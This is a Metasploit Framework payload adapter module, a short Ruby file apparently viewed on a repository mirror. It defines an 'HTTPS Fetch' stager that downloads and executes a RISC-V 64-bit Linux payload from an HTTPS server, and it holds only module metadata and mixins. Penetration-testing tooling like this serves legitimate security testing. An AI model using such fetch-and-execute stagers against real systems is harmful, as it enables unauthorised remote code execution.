Files
metasploit-gs/modules/payloads/adapters/cmd/linux/https/riscv64le.rb
T
2025-11-27 20:46:30 +11:00

26 lines
727 B
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
include Msf::Payload::Adapter::Fetch::Https
include Msf::Payload::Adapter::Fetch::LinuxOptions
def initialize(info = {})
super(
update_info(
info,
'Name' => 'HTTPS Fetch',
'Description' => 'Fetch and execute an RISC-V 64-bit payload from an HTTPS server.',
'Author' => ['Brendan Watters', 'Spencer McIntyre', 'bcoles'],
'Platform' => 'linux',
'Arch' => ARCH_CMD,
'License' => MSF_LICENSE,
'AdaptedArch' => ARCH_RISCV64LE,
'AdaptedPlatform' => 'linux'
)
)
end
end